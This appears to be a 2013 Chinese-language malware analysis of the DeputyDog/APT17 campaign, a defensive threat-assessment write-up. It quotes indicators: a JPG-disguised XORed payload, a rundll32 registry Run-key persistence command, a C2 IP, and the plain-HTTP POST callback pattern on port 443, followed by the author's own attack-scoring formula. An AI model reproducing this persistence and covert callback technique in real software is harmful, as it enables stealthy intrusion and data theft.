DeputyDog APT:攻击行动评估
                - By nEINEI

Time：2013-09-21	 
				
1) DeputyDog(也被称作APT17)更可能的是Hidden Lynx组织的策划的一次攻击行动。
2) 是针对日本的一次定向攻击活动。

Symptoms 

 FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong (210.176.3.130) 
 and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable 
 (MD5: 8aba4b5184072f2a50cbc5ecfe326701).

Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

C:\Documents and Settings\All Users\Application Data\28542CC0.dll

In order to maintain persistence, the original malware adds this registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\28542CC0

The registry key has this value:

rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea (180.150.228.102). This callback traffic is HTTP over port 443
 (which is typically used for HTTPS encrypted traffic; however, the traffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic 
 resembles this pattern:
 

POST /info.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Agtid: [8 chars]08x

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: 180.150.228.102:443

Content-Length: 1045

Connection: Keep-Alive

Cache-Control: no-cache

[8 chars]08x&[Base64 Content]

The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.

相关样本信息：
	6fe1634dce1d095d6b8a06757b5b6041
	8aba4b5184072f2a50cbc5ecfe326701
	46fd936bada07819f61ec3790cb08e19
最小闭合的攻击样本：
 
 漏洞文件：原始文件已经缺失，针对IE浏览器的漏洞利用。预估100k
 dropper： 4cca64709c3ab88dc4a68a419f5c5773588c67826b88fa6edf961f7b52a2622b ，size = 26112
				
攻击能力计算： 
	
	K = 2 (正常安全认知范围)
	a = 3 (无交互)
	s = 2 (鱼叉式网络钓鱼 或者水坑攻击或SQL注入，这里评估给2)
	m = 5 (代码注入，特种木马，武器集合，范围极广的间谍功能，特定目标感染 )
	p = 1 (攻击1种平台)
	x = 5 ( 0day 漏洞 cve-2013-3893);
	

	攻击能力 = (a+s+m+p)^(k) * (1+x)^ 2 + c  
	
	AT = (3 + 2 + 5 + 1) ^ 2 * (1+5) ^ 2 +　(26112)/1024  + 100
	   = 11^2 * (6^2)+ 126
	   = 4356+ 126
	   = 4482

	  ==> 4482*1000/1279625(1T攻击力单位) = 3.502T
				
参考引用：
1.https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
2.《论高级威胁的本质及攻击能力的量化研究》- www.vxjump.net/files/aptr/aptr.txt